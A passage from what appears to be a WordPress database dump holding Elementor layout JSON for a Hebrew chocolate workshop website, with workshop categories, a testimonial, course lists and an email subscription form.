":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":24,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/michael-browning-188999.png\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"50\"},\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3 \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":28},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"bold\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"43f8ef8f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"39181ab4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"Your Email\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"49cd254f\",\"elType\":\"section\",\"settings\":{\"border_border\":\"dotted\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"rgba(255,255,255,0.56)\",\"margin\":{\"unit\":\"px\",\"top\":\"80\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3f5ce056\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":40,\"_inline_size_mobile\":40},\"elements\":[{\"id\":\"6653aa2c\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":70},\"image\":{\"id\":38,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(123,39,'_elementor_version','0.4'),(125,40,'_wp_page_template','elementor_canvas'),(126,40,'_elementor_edit_mode','builder'),(127,40,'_elementor_template_type','post'),(128,40,'_elementor_data','[{\"id\":\"3d7689b8\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"570504a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"4fadbe7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" 